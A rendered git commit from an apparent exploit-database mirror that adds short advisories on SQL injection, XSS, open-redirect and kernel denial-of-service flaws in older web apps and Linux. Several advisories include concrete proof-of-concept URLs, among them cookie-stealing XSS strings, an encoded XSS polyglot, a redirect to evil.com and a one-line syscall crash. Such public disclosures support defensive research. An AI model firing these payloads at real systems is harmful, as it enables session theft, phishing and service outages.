DB: 2015-03-30
11 new exploits
This commit is contained in:
parent
1948d720b8
commit
665f029efc
12 changed files with 139 additions and 1 deletions
13
files.csv
13
files.csv
|
@ -32933,7 +32933,7 @@ id,file,description,date,author,platform,type,port
|
|||
36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal Vulnerability",2012-01-06,demonalex,windows,remote,0
|
||||
36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0
|
||||
36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0
|
||||
36516,platforms/windows/remote/36516.py,"Acunetix OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0
|
||||
36516,platforms/windows/remote/36516.py,"Acunetix <=9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0
|
||||
36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
|
||||
36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
|
||||
36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0
|
||||
|
@ -32950,3 +32950,14 @@ id,file,description,date,author,platform,type,port
|
|||
36530,platforms/php/webapps/36530.txt,"ClipBucket 2.6 view_item.php type Parameter XSS",2012-01-09,YaDoY666,php,webapps,0
|
||||
36531,platforms/php/webapps/36531.txt,"ClipBucket 2.6 videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0
|
||||
36532,platforms/php/webapps/36532.txt,"ClipBucket 2.6 channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0
|
||||
36534,platforms/php/webapps/36534.txt,"MARINET CMS room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0
|
||||
36535,platforms/php/webapps/36535.txt,"MARINET CMS galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0
|
||||
36536,platforms/php/webapps/36536.txt,"MARINET CMS gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0
|
||||
36537,platforms/multiple/remote/36537.txt,"SonicWall AntiSpam & EMail 7.3.1 Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0
|
||||
36538,platforms/php/webapps/36538.txt,"Gregarius <= 0.6.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-01-09,sonyy,php,webapps,0
|
||||
36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0
|
||||
36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0
|
||||
36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0
|
||||
36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0
|
||||
36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0
|
||||
36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
12
platforms/linux/dos/36545.txt
Executable file
12
platforms/linux/dos/36545.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/51389/info
|
||||
|
||||
The Linux kernel is prone to a local denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
|
||||
|
||||
NOTE: This issue affects Linux kernels running as guest images.
|
||||
|
||||
[bits 32]
|
||||
global _start
|
||||
SECTION .text
|
||||
_start: syscall
|
11
platforms/multiple/remote/36537.txt
Executable file
11
platforms/multiple/remote/36537.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/51337/info
|
||||
|
||||
SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or conduct phishing attacks. Other attacks are also possible.
|
||||
|
||||
AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C*
|
||||
|
||||
http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction=
|
7
platforms/php/webapps/36534.txt
Executable file
7
platforms/php/webapps/36534.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51336/info
|
||||
|
||||
Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/room2.php?roomid=[SQLi]
|
7
platforms/php/webapps/36535.txt
Executable file
7
platforms/php/webapps/36535.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51336/info
|
||||
|
||||
Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/galleryphoto.php?id=[SQLi]
|
7
platforms/php/webapps/36536.txt
Executable file
7
platforms/php/webapps/36536.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51336/info
|
||||
|
||||
Marinet CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/gallery.php?photoid=1&id=[SQLi]
|
11
platforms/php/webapps/36538.txt
Executable file
11
platforms/php/webapps/36538.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/51338/info
|
||||
|
||||
Gregarius is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Gregarius versions 0.6.1 and prior are vulnerable.
|
||||
|
||||
http://www.example.com/?page=1[it'shere]&media=rss&
|
||||
http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8[it'shere xss with sql]
|
||||
http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
|
9
platforms/php/webapps/36539.txt
Executable file
9
platforms/php/webapps/36539.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51339/info
|
||||
|
||||
Advanced File Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Advanced File Management 1.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/users.php?page=[xss]
|
9
platforms/php/webapps/36540.txt
Executable file
9
platforms/php/webapps/36540.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51357/info
|
||||
|
||||
WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
A successful exploit may aid in phishing attacks; other attacks are possible.
|
||||
|
||||
WordPress Age Verification plugin 0.4 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com
|
9
platforms/php/webapps/36541.txt
Executable file
9
platforms/php/webapps/36541.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51365/info
|
||||
|
||||
PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
PHP-Fusion 7.02.04 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/[Path]/downloads.php?cat_id=[Xss]
|
12
platforms/php/webapps/36543.txt
Executable file
12
platforms/php/webapps/36543.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/51373/info
|
||||
|
||||
KnowledgeTree is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
KnowledgeTree 3.7.0.2 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/login.php/%22onmouseover=alert%28document.cookie%29;%3E
|
||||
http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
|
||||
http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E
|
||||
http://www.example.com/preferences.php/%22onmouseover=alert%28document.cookie%29;%3E
|
33
platforms/php/webapps/36544.txt
Executable file
33
platforms/php/webapps/36544.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
source: http://www.securityfocus.com/bid/51377/info
|
||||
|
||||
Kayako SupportSuite is prone to the following vulnerabilities:
|
||||
|
||||
1. Multiple HTML-injection vulnerabilities.
|
||||
2. A remote code-execution vulnerability.
|
||||
3. Multiple cross-site scripting vulnerabilities.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.
|
||||
|
||||
Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable.
|
||||
|
||||
Remote code-execution:
|
||||
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register
|
||||
|
||||
Cross-site scripting:
|
||||
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=news&_a=managenews
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts
|
||||
|
||||
http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters
|
Loading…
Add table
Reference in a new issue